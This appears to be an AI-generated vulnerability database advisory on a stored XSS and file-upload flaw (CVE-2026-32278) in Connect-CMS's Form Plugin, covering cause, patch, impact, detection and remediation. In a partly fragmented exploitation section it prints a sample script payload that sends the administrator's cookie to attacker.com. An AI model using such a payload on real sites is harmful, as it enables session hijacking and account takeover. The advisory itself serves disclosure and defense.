
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-32278 is a Stored Cross-Site Scripting (XSS) vulnerability in the file field of the Form Plugin in Connect-CMS, an open-source content management system developed by opensource-workshop. The vulnerability affects all 1.x series versions up to and including 1.41.0, and all 2.x series versions up to and including 2.41.0. It was disclosed on March 23, 2026, with patches released the same day. The GitHub Advisory Database rates this vulnerability as High severity with a CVSS v3.1 score of 8.2 (Github Advisory, Security Advisory).
The vulnerability is rooted in two weaknesses: CWE-434 (Unrestricted Upload of File with Dangerous Type) and CWE-79 (Stored Cross-Site Scripting). Prior to the patch, the Form Plugin's file field did not enforce restrictions on uploaded file types or validate file extensions and MIME types, allowing an attacker to upload files with dangerous types (e.g., HTML files containing JavaScript). The patch commit (9d87fe8) reveals that the fix involved removing .html from the list of allowed file extensions in the upload controller, adding custom validation rules (CustomValiUploadExtensions, CustomValiUploadMimetypes) for file uploads, and introducing per-column file extension and size restrictions (Security Advisory, Patch Commit). Exploitation requires network access and user interaction (an administrator viewing the uploaded content), but no privileges are required to submit the malicious file through the form.
If exploited, arbitrary scripts stored via the malicious file upload execute in an administrator's browser when they view the affected form submission, potentially leading to session hijacking, credential theft, and unauthorized administrative actions. The vulnerability has a changed scope, meaning the impact extends beyond the vulnerable component itself to the broader application and its users. High confidentiality and integrity impacts are assessed, as an attacker could exfiltrate sensitive data or manipulate CMS content and settings through the compromised administrator session (Github Advisory, Security Advisory).
No public proof-of-concept exploit code or evidence of in-the-wild exploitation has been reported as of the time of disclosure (Github Advisory). The EPSS score is approximately 0.038–0.051%, placing it in the 16th percentile for exploitation likelihood within 30 days. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been identified. The vulnerability was responsibly disclosed by Sho Odagiri of GMO Cybersecurity by Ierae, Inc. (Security Advisory).
payload.html) containing a JavaScript payload, such as <script>document.location='https://attacker.com/steal?c='+document.cookie;</script>, designed to exfiltrate the administrator's session cookie..html files were permitted and no MIME type validation was enforced, allowing the file to be stored on the server..html or other non-standard file types in the Connect-CMS uploads directory (e.g., storage/app/uploads/) that contain JavaScript or HTML content rather than expected document types..html files to the forms upload endpoint; CMS application logs recording file submissions with unexpected MIME types or extensions prior to the patch being applied.The primary remediation is to upgrade Connect-CMS to the patched versions: 1.41.1 for the 1.x branch or 2.41.1 for the 2.x branch, both released on March 23, 2026 (v1.41.1 Release, v2.41.1 Release). As a temporary workaround prior to patching, administrators should disable or restrict access to any forms using the file upload field type, or implement a Content Security Policy (CSP) to limit script execution. Additionally, restricting allowed file upload extensions at the web server or application firewall level (blocking .html and other executable types) can reduce risk until the patch is applied (Security Advisory).
The vulnerability was reported by Sho Odagiri of GMO Cybersecurity by Ierae, Inc. and acknowledged by the Connect-CMS maintainers (opensource-workshop) in the official security advisory (Security Advisory). Social media activity was limited to automated CVE tracking accounts on Mastodon and Bluesky shortly after disclosure, with no notable independent researcher commentary or significant media coverage identified.
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."